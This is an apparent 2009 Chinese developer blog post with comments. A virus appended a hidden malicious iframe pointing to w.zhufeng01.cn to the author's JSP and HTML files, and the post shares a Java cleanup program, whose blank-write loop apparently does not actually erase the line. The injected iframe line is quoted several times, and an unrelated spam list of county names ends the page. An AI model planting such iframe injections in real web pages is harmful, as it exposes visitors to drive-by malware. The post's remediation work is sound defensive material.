<ul id="egmes"><tbody id="egmes"></tbody></ul>
<samp id="egmes"><pre id="egmes"></pre></samp>
<kbd id="egmes"><pre id="egmes"></pre></kbd>
冷面閻羅
低調做人&&高調做事
隨筆 - 208, 文章 - 3, 評論 - 593, 引用 - 0
數據加載中……
中了一個很奇怪的病毒,所有的jsp文件均為改寫
上周末,機器中毒了,起初自己沒有發現,后來寫代碼發現運行jsp文件,機器變的奇慢務必,后來以為是機器慢,就把qq、msn 等工具全關掉了,發現還是不行,后來把上網的代理關掉時候發現正常了;再一看jsp文件發現全部被改寫了,在文件最后一行加上
<
iframe src
=
http:
//
w.zhufeng01.cn/a.htm width=100 height=0></iframe>
于是上網找殺毒軟件,剛開始用的諾頓(公式規定必須安裝),發現不行就換別的軟件,可是病毒不讓你安裝別的殺毒軟件,甚至打開有解決方法的網頁,都會將ie關閉。
后來同事給了360,算是把病毒穩定了,可是我的jsp、html文件都被改寫了,這時想到寫程序解決,下面是我弄的java程序刪除文件中被增加的iframe。
import
java.io.File;
import
java.io.RandomAccessFile;
public
class
RepairPage
{
private
static
int
num;
private
String worm
=
"
<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>
"
;
public
void
repair(File page)
{
//
System.out.println("Try File:"+page.getPath());
try
{
RandomAccessFile r
=
new
RandomAccessFile(page,
"
rw
"
);
if
(r.length()
<
68
)
return
;
r.seek(r.length()
-
68
);
//
跳到最后一行
String shit
=
r.readLine();
if
(shit.equals(worm))
{
//
System.out.println("shit content:"+shit);
System.out.println(
"
修復損壞文件:
"
+
page.getPath());
r.seek(r.length()
-
68
);
for
(
int
i
=
0
; i
<
worm.length(); i
++
)
{
r.writeBytes(
""
);
}
num
++
;
}
}
catch
(Exception e)
{
e.printStackTrace();
}
}
public
void
doDir(File dir)
{
if
(dir.canRead())
{
if
(dir.isDirectory())
{
String[] files
=
dir.list();
if
(files
!=
null
)
{
for
(
int
i
=
0
; i
<
files.length; i
++
)
{
doDir(
new
File(dir, files[i]));
//
遞歸
}
}
}
else
{
//
is File
String name
=
dir.getName();
if
(name.endsWith(
"
jsp
"
)
||
name.endsWith(
"
html
"
)
||
name.endsWith(
"
htm
"
))
repair(dir);
}
}
}
public
static
void
main(String[] args)
{
File dir
=
new
File(
"
E://program//guizhou//09檢試源碼//web//
"
);
RepairPage repair
=
new
RepairPage();
repair.doDir(dir);
System.out.println(
"
修復成功完成,修復文件數:
"
+
repair.num);
}
}
posted on 2009-02-17 10:49
冷面閻羅
閱讀(1293)
評論(8)
編輯
收藏
評論
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫[未登錄]
回復
更多評論
恩,我也中過這個病毒。我中的時候每個網頁的iframe里面src的值都不一樣的。
2009-02-17 11:35 |
haha
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
我現在中的就是這個毒但是用360還是殺不了病毒。
360發現沒有病毒,但是用vs新建一個網頁文件他又會在最后面加上這個<iframe src=
http://w.zhufeng01.cn/a.htm
width=100 height=0></iframe>
2009-02-18 10:06 |
bigeng
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
操,不會CVS重新down一份么?
2009-02-18 10:19 |
hdware
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
呵呵,碰到過,硬改代碼恢復的,痛苦
2009-02-18 14:07 |
jeasonzhao
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫[未登錄]
回復
更多評論
媽的,上千頁面都有這個代碼,慘啊,怎么改啊
2009-02-20 10:45 |
dd
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
也中標了,而且這個shit還在壓縮文件里面加了一個病毒文件"安裝.bat".
另外請問下500錯誤之類的錯誤信息頁面在哪個文件夾下面?或者是動態生成的?
2009-02-23 15:55 |
tt
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
哦.另外問下你這個程序是在什么環境下運行的?
還有好象這個病毒下載的東西把host文件也給改了,把殺軟的網址全指向本地,并且來了一句以下為惡意網站,殺了毒之后系統藍屏,這兩天真被弄死了
2009-02-23 16:00 |
tt
#
re: 中了一個很奇怪的病毒,所有的jsp文件均為改寫
回復
更多評論
這是ARP病毒,
2010-05-15 14:06 |
asfd
新用戶注冊
刷新評論列表
只有注冊用戶
登錄
后才能發表評論。
網站導航:
博客園
IT新聞
Chat2DB
C++博客
博問
管理
Powered by:
BlogJava
Copyright © 冷面閻羅
導航
管理
文章檔案
2007年5月 (1)
2007年4月 (1)
2007年3月 (1)
最新評論
1.?re: 動態給select添加選項的常用方法
garb
--自行車
2.?re: 動態給select添加選項的常用方法
第三方菲菲
--自行車
3.?re: 對前幾天作的java萬年歷,再弄修改,加上農歷
建議用冬月、臘月而不是十一月、十二月等
---
4.?re: java代碼中順序問題,養成良好代碼書寫習慣
問額外
--對方是否
5.?re: HTTP請求發送XML數據
ios中的發送裸數據xml怎么發送
--夜鶯
主站蜘蛛池模板:
类乌齐县
|
涞水县
|
正安县
|
治多县
|
监利县
|
临沧市
|
安多县
|
丹巴县
|
新野县
|
怀宁县
|
泰顺县
|
屏东县
|
白银市
|
比如县
|
海城市
|
大化
|
宝丰县
|
赤水市
|
武宁县
|
扶绥县
|
姜堰市
|
老河口市
|
和顺县
|
洮南市
|
大渡口区
|
麦盖提县
|
肥东县
|
汉寿县
|
清远市
|
临高县
|
姚安县
|
石景山区
|
云浮市
|
宜章县
|
建瓯市
|
江阴市
|
辽阳市
|
苗栗市
|
南木林县
|
大冶市
|
柏乡县
|